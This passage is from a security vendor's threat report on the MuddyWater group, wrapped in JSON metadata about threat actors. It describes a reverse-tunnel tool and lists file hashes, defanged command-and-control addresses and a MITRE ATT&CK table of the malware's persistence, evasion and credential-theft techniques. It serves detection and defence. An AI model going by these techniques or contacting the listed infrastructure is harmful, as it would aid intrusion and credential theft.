-s\"\r\nbuild CGO_ENABLED=1\r\nbuild CGO_CFLAGS=\r\nbuild CGO_CPPFLAGS=\r\nbuild CGO_CXXFLAGS=\r\nbuild CGO_LDFLAGS=\r\nbuild GOARCH=amd64\r\nbuild GOOS=windows\r\nbuild GOAMD64=v1\r\nFigure 9. Build configuration strings from MuddyWater’s go‑socks5 variants\r\nThe primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a\r\nspecific port) and a hardcoded C\u0026C server, using a hardcoded connection key to authenticate with the C\u0026C server via\r\nSSL/TLS. This setup allows the attacker to route C\u0026C traffic (potentially related to other compromises) through the\r\ncompromised machine and thus to hide the location of the real C\u0026C server.\r\nConclusion\r\nThis campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously\r\nundocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth,\r\npersistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a\r\ndiversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational\r\nimmaturity remain.\r\nMuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being\r\ntimely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading\r\nactor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.\r\nESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic\r\ntargeting of government, military, telecommunications, and critical infrastructure.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 13 of 20\n\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename Detection Description\r\n76632910CF67697BF5D7\r\n285FAE38BFCF438EC082\r\nOsUpdater.exe Win64/MuddyWater.E MuddyWater – Fooder\r\nlauncher.\r\n1723D5EA7185D2E339FA\r\n9529D245DAA5D5C9A932\r\nBlub.exe Win64/MuddyWater.H MuddyWater – Blub\r\nbrowser-data stealer.\r\n69B097D8A3205605506E\r\n6C1CC3C13B71091CB519\r\nBlub.exe Win64/MuddyWater.H MuddyWater – Blub\r\nbrowser-data stealer.\r\nB7A8F09CB5FF8A336539\r\n88FFBA585118ACF24C13\r\nBlub.exe Win64/MuddyWater.H MuddyWater – Blub\r\nbrowser-data stealer.\r\nB8997526E4781A6A1479\r\n690E30072F38E091899D\r\nstealer.exe Win64/MuddyWater.H\r\nMuddyWater – Blub\r\nbrowser-data stealer.\r\n8E21DE54638A79D8489C\r\n59D958B23FE22E90944A\r\n7d1e9726b5YZPYc\r\n.dll\r\nWin32/MuddyWater.B MuddyWater – CE-Notes\r\nbrowser-data stealer.\r\nCD47420F5CE408D95C98\r\n306D78B977CDA0400C8F\r\nfe197add74IVcQn.exe Win64/MuddyWater.I MuddyWater – CE-Notes\r\nbrowser-data stealer.\r\nC1299E8C9A8567A9C292\r\n157F3ED65B818AA78900\r\nvmsvc.exe Win64/MuddyWater.I MuddyWater – CE-Notes\r\nbrowser-data stealer.\r\n29CDA06701F9A9C0A679\r\n1775C3EB70F5B52BBEFF\r\n3a70e4c8c2IVcQn\r\n.exe Win64/MuddyWater.C\r\nMuddyWater – LP-Notes\r\ncredential stealer.\r\n8F3ED626E7B929450E36\r\nE97BA5539C8371DF0EF8\r\n3a70e4c8c2IVcQn\r\n.exe\r\nWin64/MuddyWater.C MuddyWater – LP-Notes\r\ncredential stealer.\r\n007B5CD6D6ACF972F774\r\n3F79E23CAB9BB2ECBEE3\r\nDsync-es.exe Win64/MuddyWater.F MuddyWater – Mimikatz\r\nloader.\r\nCD36F93DBC4C71893059\r\n3D8F029EFDCAA52B619B\r\nApp_chek.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nHackBrowserData tool.\r\n47B70C47BEB33E88B419\r\n7D6AF1B768230E51B067\r\nsteam.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\ngo‑socks5 reverse tunnel.\r\nD46900D78AE036967E0B\r\n37F9EC6A8000131AE604\r\nantimage.exe Win32/MuddyWater.A\r\nMuddyWater – Fooder\r\nloader with embedded\r\ngo‑socks5 reverse tunnel.\r\n0657D0B0610618886DDD\r\n74C3D0A1D582CDD24863\r\nwtsapi32.dll Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\n2939FD218E0145D730BD\r\n94AA1C76386A5259EACE\r\nmsi.dll Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 14 of 20\n\nSHA-1 Filename Detection Description\r\n3BC6502A55A4D5D29132\r\nDA4D9943E154A810CC83\r\nWinWin.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\n7950296331802188EB99\r\nE232E2C383CB9FDD5D7D\r\n20241118_223247\r\n_Launcher.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\n8580824FE14DB1583881\r\n02B16C1C79DFBBA36083\r\nLauncher.dll Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\nB48B93B4EB69D01588D3\r\n71356EDE614C5E7378DE\r\nLauncher.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\nEA8A1C2382FF765709D7\r\nF78EF60482598E4C0DEB\r\nvcruntime140_1.dll Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\nEAF4BAFC62170C9FCA1F\r\n6B591848883DBF97F93D\r\nLauncher.exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\nF5EFBA6CCBA5A6AD6C3A\r\nFA928C0E5EAA44597411\r\nncrypt.dll Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\n13DA612D75DC5268F523\r\n5F5BACE6D8F0DB0091FF\r\nWinWin(persist).exe Win64/MuddyWater.G\r\nMuddyWater – Fooder\r\nloader with embedded\r\nMuddyViper backdoor.\r\n25361183DE63F296BA71\r\nB6FCF0725E022B3C989A\r\n0bff183a39ruQsY.dll\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n0E9A4892CFA1C9065B36\r\nD8F2E164E28609A8CF5D\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n2B09241CA025BDC4455E\r\n9F6BA6009E2F27C08EDF\r\ndttcodexgigas.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n2E9BE23CDD8152DB6CD1\r\nA54E001C4EA82FF6F1C6\r\n7295be2b1fHxjyf.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n45FA7DE711FEA1F8D1E3\r\n48E87834246C455DD2ED\r\nfa54125dc8ZpaNJ.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n4E0EF2386980639FC535\r\n5FD68DAFF54EB2AD622E\r\n20d188afdcWgOQB\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n4E9529BA4A6E42D6278D\r\n37E3FDEE9E1D991CEBE0\r\nbd34a33f5bHOVby\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n50C6D4A2AD16A231CF11\r\nC43F3BBC868D90E20D25\r\nre.exe WinGo/TrojanProxy\r\n.Agent.F\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n52009F36058337B6401D\r\nA0A0F4885A0C185F0520\r\nbd34a33f5bHOVby\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n535882B6EDAB29247E03\r\n5236A84CA510FB1E0854\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 15 of 20\n\nSHA-1 Filename Detection Description\r\n544CE18E4C1F1B288DEE\r\n6018DFCF4E4D4A315F7A\r\n1110254b63WfTEa\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n54EBC125039CC83E4682\r\nCA44DD592534562B25C3\r\nFMAPP.dll\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n5A08150C1DC17E9F6912\r\n96F0A577C2EC9BA8028C\r\nbd34a33f5bJeJOf.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nproxy reverse tunnel.\r\n5D1E61DA8083C41FF1FC\r\n23A1222A4A88B43A4E9B\r\nbd34a33f5bJeJOf.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n6532E0437C8913FA418F\r\n1EE258561B15BBEE9052\r\n7295be2b1fHxjyf.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n6CA41565844118385B34\r\n5A39A9B79E0BBC0DD338\r\nre.exe WinGo/TrojanProxy\r\n.Agent.F\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n6FC50A99AAE1D6C40111\r\n632D4F49BD19F9794CF6\r\n8525e604dfKuDNr\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n826CFF5D85713CE4B2F3\r\nC15AB53A84E6848D2E2C\r\nbd34a33f5bJeJOf.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n87ADD79C7C8335447113\r\nEE0D413F52AE2B17F066\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n93055115559219BE8441\r\n880597C533381B99213B\r\nmain.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n97C3376AB551E899F347\r\nCC9DDF49EA01DB2D7903\r\n504f53ca8esoLmG.dll\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\n99FAD0862E2E8D363F3E\r\n18952FD92E09493CC27D\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nA101CBCCD950AA36FC3B\r\n40C3C331FDE43ACDBBD2\r\n66f3e097e4tnyHR.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nA227C0A4425E24268B75\r\n9A740231676A589CA4E6\r\nfa54125dc8ZpaNJ.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nA997A7AAE727D2C12CCE\r\n80FE3607317775A4DF3E\r\nfa54125dc8ZpaNJ.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nB0271CA76052EC340014\r\nD7BCCDBD69325A4E60F2\r\n7295be2b1fAzMZI\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nB0CD4F5DF192BFFE6500\r\nE44B80C28505DFD9CA66\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nB16E7D56A8DC0FF6B3AF\r\nD797E1EAB22B20DFFB39\r\nESETGO.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nD49979D0063B28BD7339\r\n0481E6AE642C00CE0791\r\n20d188afdcpfLFq.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nD518F5C648AB64B390A2\r\n9AA2858219318CFC556A\r\nbd34a33f5bHOVby\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nDF223D653F761ED55F9C\r\n0774F1DBF545FD741F86\r\n66f3e097e4tnyHR.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 16 of 20\n\nSHA-1 Filename Detection Description\r\nDF8FC5213AA11EE445EA\r\nD1AAE17A826E7D51A743\r\nRevoke.dll\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nE02DD79A8CAED662969F\r\n6D5D0792F2CB283116E8\r\n66f3e097e4tnyHR.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nE8F4EA3857EF5FDFEC1A\r\n2063D707609251F207DB\r\nmain.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nF26CAE9E79871DF3A47F\r\nA61A755DC028C18451FC\r\n7295be2b1fAzMZI\r\n.exe\r\nWinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nFF09608790077E1BA52C\r\n03D9390E0805189ADAD7\r\n20d188afdcpfLFq.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nA9747A3F58F8F408FECE\r\nFC48DB0A18A1CB6DACAE\r\nAppVs.exe WinGo/TrojanProxy\r\n.Agent.D\r\nMuddyWater – go‑socks5\r\nreverse tunnel.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n3.95.7[.]142 N/A Amazon Data Services NoVa 2024‑09‑08 MuddyWater C\u0026C\r\nserver.\r\n35.175.224[.]64 N/A Amazon Technologies Inc. 2024‑10‑10 MuddyWater C\u0026C\r\nserver.\r\n51.16.209[.]105\r\napi.tikavod\r\not.co[.]il\r\nAmazon Data Services Ireland\r\nTechnical Role Account\r\n2024‑09‑15\r\nMuddyWater C\u0026C\r\nserver.\r\n62.106.66[.]112 N/A\r\nRIPE-NCC-HM-MNT, ORG-NCC1-RIPE\r\n2024‑09‑29 MuddyWater staging\r\nserver.\r\n157.20.182[.]45 N/A Hosterdaddy Private Limited 2024‑04‑18 MuddyWater staging\r\nserver.\r\n161.35.172[.]55 N/A  DigitalOcean, LLC 2022‑11‑12 MuddyWater staging\r\nserver.\r\n167.99.224[.]13\r\nmagically\r\nday[.]com\r\nDigitalOcean, LLC 2022‑11‑06 MuddyWater C\u0026C\r\nserver.\r\n194.11.246[.]78 N/A HosterDaddy Private Limited 2024‑07‑23\r\nMuddyWater C\u0026C\r\nserver.\r\n194.11.246[.]101\r\nprocessplan\r\net[.]org\r\nAdministrator 2024‑08‑27 MuddyWater staging and\r\nC\u0026C server.\r\n206.71.149[.]51 N/A BL Networks 2023‑10‑30 MuddyWater staging\r\nserver.\r\n212.232.22[.]136 N/A HosterDaddy Private Limited 2025‑01‑16 MuddyWater C\u0026C\r\nserver.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 17 of 20\n\nTactic ID Name Description\r\nReconnaissance T1591\r\nGather Victim Org\r\nInformation\r\nMuddyWater gathers victim org info to use in\r\nspearphishing emails.\r\nResource\r\nDevelopment\r\nT1583 Acquire Infrastructure MuddyWater uses acquired infrastructure to host\r\nmalware download locations and C\u0026C servers.\r\nT1608 Stage Capabilities\r\nMuddyWater stages tools like RMM tools and data\r\nstealers on file-hosting sites such as OneHub and Mega\r\nLimited.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nMuddyWater develops backdoors like MuddyViper and\r\ntools such as the Fooder loader, LP-Notes credential\r\nstealer, and the Blub and CE-Notes browser-data\r\nstealers.\r\nT1588.002\r\nObtain Capabilities:\r\nTool\r\nMuddyWater uses publicly available tools from GitHub,\r\nsuch as HackBrowserData and Go-based reverse\r\nproxies.\r\nInitial Access T1566.002\r\nPhishing: Spearphishing\r\nLink\r\nMuddyWater uses spearphishing emails with links to\r\nfile hosting sites like OneHub and Mega Limited to host\r\nRMM software (Atera, Level, and PDQ).\r\nExecution\r\nT1059.001\r\nCommand-Line\r\nInterface: PowerShell\r\nMuddyViper has the capability to open and execute\r\nPowerShell scripts.\r\nT1059.003\r\nCommand-Line\r\nInterface: Windows\r\nCommand Shell\r\nMuddyViper has the capability to offer the Windows\r\nCommand shell as a reverse shell.\r\nT1559.001\r\nInter-Process\r\nCommunication:\r\nComponent Object\r\nModel\r\nMuddyViper uses the ITaskService COM object to\r\ncreate a scheduled task for persistence.\r\nT1106 Native API MuddyViper uses the CreateProcess API to execute\r\nadditional files and commands.\r\nT1204.001\r\nUser Execution:\r\nMalicious Link\r\nMuddyWater operators rely on targets clicking\r\nmalicious links delivered through spearphishing.\r\nPersistence\r\nT1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys / Startup Folder\r\nMuddyViper has the capability to copy itself to the\r\nvictim’s Startup folder.\r\nT1543.003\r\nCreate or Modify\r\nSystem Process:\r\nWindows Service\r\nMuddyWater operators attempt to install RMM tools in\r\n%PROGRAMFILES%, which also includes creating a\r\nWindows service set to autostart.\r\nT1053 Scheduled Task/Job\r\nMuddyViper can be persisted as a scheduled task named\r\nManageOnDriveUpdater.\r\nDefense\r\nEvasion T1134.001\r\nAccess Token\r\nManipulation: Token\r\nImpersonation/Theft\r\nThe LP-Notes and CE-Notes tools attempt to\r\nimpersonate a logged-on user’s security context via\r\nImpersonateLoggedOnUser.\r\nT1140 \r\nDeobfuscate/Decode\r\nFiles or Information\r\nBlub uses string obfuscation for storing stolen data.\r\nFooder can extract embedded, AES-encrypted payloads.\r\nCE-Notes and LP-Notes both use a custom byte-wise\r\ndecryption routine to decrypt strings.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 18 of 20\n\nTactic ID Name Description\r\nT1620\r\nReflective Code\r\nLoading\r\nThe Fooder loader performs reflective code loading to\r\nrun additional tools (MuddyViper, reverse tunnels, and\r\nHackingBrowserData).\r\nT1497.003\r\nVirtualization/Sandbox\r\nEvasion: Time Based\r\nEvasion\r\nMuddyViper uses many calls to a sleep function to\r\ndetect and avoid virtualization and analysis\r\nenvironments, and generally to inhibit dynamic\r\nanalysis.\r\nT1027.007\r\nObfuscated Files or\r\nInformation: Dynamic\r\nAPI Resolution\r\nCE-Notes and LP-Notes perform dynamic API\r\nresolution by decrypting strings at runtime.\r\nT1134.002\r\nAccess Token\r\nManipulation: Create\r\nProcess with Token \r\nFooder’s launcher attempts to duplicate the token of a\r\nprocess specified by the operator when launching\r\nFooder via CreateProcessAsUserA.\r\nT1622 Debugger Evasion \r\nMuddyViper searches for specific debugging tools,\r\nadjusting its behavior accordingly.\r\nT1070.009\r\nIndicator Removal:\r\nClear Persistence\r\nMuddyViper can modify registry keys used for\r\npersistence, if instructed to uninstall itself.\r\nT1070.004\r\nIndicator Removal: File\r\nDeletion\r\nMuddyViper can delete itself from the system, if\r\ninstructed to uninstall itself.\r\nT1036 Masquerading\r\nSome versions of Fooder masquerade as an innocuous\r\nSnake game.\r\nT1036.004\r\nMasquerading:\r\nMasquerade Task or\r\nService\r\nMuddyViper can create a task named\r\nManageOnDriveUpdater.\r\nT1112 Modify Registry\r\nMuddyViper can modify the\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVe\r\nrsion\\Explorer\\User Shell Folders\\Startup and\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVe\r\nrsion\\Explorer\\Shell Folders\\Startup registry keys, to\r\nchange the location of the Startup folder.\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nFooder can extract an embedded, AES-encrypted\r\npayload.\r\nT1027.013\r\nObfuscated Files or\r\nInformation:\r\nEncrypted/Encoded File\r\nFooder can extract an embedded, AES-encrypted\r\npayload.\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from\r\nPassword Stores:\r\nCredentials from Web\r\nBrowsers\r\nCE-Notes and Blub attempt to steal credentials stored in\r\nbrowsers.\r\nT1056.002 \r\nInput Capture: GUI\r\nInput Capture\r\nMuddyViper and LP-Notes have the ability to display a\r\nWindows security login prompt to capture login\r\ncredentials and confirm the credentials’ veracity by\r\nrelaying those credentials to legitimate Windows APIs.\r\nDiscovery\r\nT1082 \r\nSystem Information\r\nDiscovery\r\nMuddyViper collects system information from\r\ncompromised systems and reports it back to the C\u0026C\r\nserver.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 19 of 20\n\nTactic ID Name Description\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nMuddyViper attempts to get a process list of running\r\napplications, looks for security-related processes and, if\r\nfound, reports them to the C\u0026C server and modifies its\r\nbehavior.\r\nCollection\r\nT1074.001\r\nData Staged: Local Data\r\nStaging\r\nBlub, CE-Notes, and LP-Notes stage stolen credentials\r\non disk for MuddyViper, reverse tunnels, or RMM tools\r\nto collect and exfiltrate.\r\nT1560.001 \r\nArchive Collected Data:\r\nArchive via Utility\r\nMuddyViper uses PowerShell’s Compress-Archive\r\ncommand to compress browser data collected via the\r\nHackBrowserData utility.\r\nCommand and\r\nControl\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric\r\nCryptography\r\nMuddyViper uses AES-CBC encryption to encrypt data\r\nbefore exchanging data with the C\u0026C server.\r\nT1219\r\nRemote Access\r\nSoftware\r\nMuddyWater use Atera, Level, and PDQ RMM tools for\r\nremote access to victims’ systems.\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nMuddyViper uses HTTPS for C\u0026C communications.\r\nThe reverse tunnels use a mixture of HTTP and HTTPS\r\nfor C\u0026C communications.\r\nT1105 Ingress Tool Transfer\r\nMuddyViper has the capability to download additional\r\npayloads from its C\u0026C server.\r\nT1001 Data Obfuscation\r\nMuddyViper leverages HTTPS for C\u0026C\r\ncommunications, using the Status header to hide a\r\nbackdoor command ID in the server-to-client direction\r\nof the communication.\r\nT1090 Proxy MuddyWater uses customized versions of go‑socks5\r\nreverse proxy tools.\r\nExfiltration\r\nT1041\r\nExfiltration Over C2\r\nChannel\r\nMuddyWater tools exfiltrate data to C\u0026C servers using\r\nC\u0026C channels (HTTP and HTTPS).\r\nT1030\r\nData Transfer Size\r\nLimits\r\nMuddyViper supports downloading/uploading files in\r\nchunks of limited size.\r\nSource: https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/" ], "report_names": [ "muddywater-snakes-riverbank" ], "threat_actors": [ { "id": "cde987a8-c71f-49e2-b761-5b7fa2b4ada6", "created_at": "2022-10-25T16:07:23.706646Z", "updated_at": "2026-04-29T06:58:57.945122Z", "deleted_at": null, "main_name": "Hexane", "aliases": [ "ATK 120", "Cobalt Lyceum", "G1001", "Lyceum", "Operation Out to Sea", "Siamesekitten", "Yellow Dev 9" ], "source_name": "ETDA:Hexane", "tools": [ "DanBot", "DanDrop", "Decrypt-RDCMan.ps1", "Get-LAPSP.ps1", "James", "Milan", "kl.ps1" ], "source_id": "ETDA", "reports": null }, { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-29T06:58:57.745497Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450", "MuddyKrill" ], "source_name": "MITRE:MuddyWater", "tools": [ "MuddyViper", "STARWHALE", "LP-Notes", "POWERSTATS", "Rclone", "Out1", "Tsundere Botnet", "PowerSploit", "Small Sieve", "Fooder", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-29T06:58:56.539549Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "ControlX", "TAG-22", "AQUATIC PANDA", "Red Dev 10", "RedHotel", "BountyGlad", "Red Scylla", "CHROMIUM", "BRONZE UNIVERSITY", "Charcoal Typhoon" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "FunnySwitch", "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-29T06:58:56.310338Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK51", "Boggy Serpens", "Earth Vetala", "Static Kitten", "COBALT ULSTER", "Mango Sandstorm", "TA450", "TEMP.Zagros", "Seedworm", "G0069" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-29T06:58:57.692044Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "a7df240e-6750-4b71-99de-85831b92faa2", "created_at": "2022-10-25T15:50:23.859253Z", "updated_at": "2026-04-29T06:58:57.731816Z", "deleted_at": null, "main_name": "HEXANE", "aliases": [ "Lyceum", "Siamesekitten", "Spirlin" ], "source_name": "MITRE:HEXANE", "tools": [ "Milan", "netstat", "BITSAdmin", "DnsSystem", "DanBot", "ipconfig", "Mimikatz", "Kevin", "PoshC2" ], "source_id": "MITRE", "reports": null }, { "id": "fb8f3a5f-01a9-498e-9396-52f844424c33", "created_at": "2023-01-06T13:46:39.045338Z", "updated_at": "2026-04-29T06:58:56.41469Z", "deleted_at": null, "main_name": "LYCEUM", "aliases": [ "COBALT LYCEUM", "UNC1530", "Spirlin", "MYSTICDOME", "siamesekitten", "Chrono Kitten", "Storm-0133" ], "source_name": "MISPGALAXY:LYCEUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-29T06:58:58.009074Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-29T06:58:57.501827Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", 